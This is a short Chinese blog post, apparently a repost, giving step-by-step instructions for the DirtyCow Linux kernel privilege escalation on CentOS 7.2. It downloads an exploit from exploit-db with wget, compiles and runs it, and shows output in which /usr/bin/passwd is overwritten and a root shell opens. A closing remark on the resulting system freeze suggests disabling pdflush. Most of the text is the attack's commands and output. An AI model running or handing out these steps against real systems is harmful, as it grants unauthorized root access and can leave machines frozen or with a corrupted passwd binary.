码迷,mamicode.com
首页 > 其他好文 > 详细

关于脏牛

时间:2017-06-13 10:12:46      阅读:337      评论:0      收藏:0      [点我收藏+]

标签:rac   编译器   download   地址   over   while   卡死   dirty   防止   

测试平台:CentOS7.2

编译工具GCC

mkdir cowroot

cd cowroot 
wget https://www.exploit-db.com/download/40616

mv 40616 cowroot.c
gcc cowroot.c -o cowroot -pthread

这时会发现GCC编译器有警告,不要管,当前目录下已经编译完成cowwroot文件了
执行cowroot

./cowroot

  • 执行

DirtyCow root privilege escalation
Backing up /usr/bin/passwd.. to /tmp/bak
Size of binary: 57048
Racing, this may take a while..
/usr/bin/passwd is overwritten
Popping root shell.
Don‘t forget to restore /tmp/bak
thread stopped
thread stopped

会发现用户已经变为root


但这里有一个问题,在执行EXP之后十几秒后,系统会卡死,在kali2.0(debian)  CentOS7.2 
ubuntu14.04测试都卡死
这样就算到时候利用这个漏洞提权成功,卡死后也没用了,只能重新登陆

方法是关闭pdfflush刷新,防止死机

关于脏牛

标签:rac   编译器   download   地址   over   while   卡死   dirty   防止   

原文地址:http://www.cnblogs.com/hookjoy/p/6996542.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!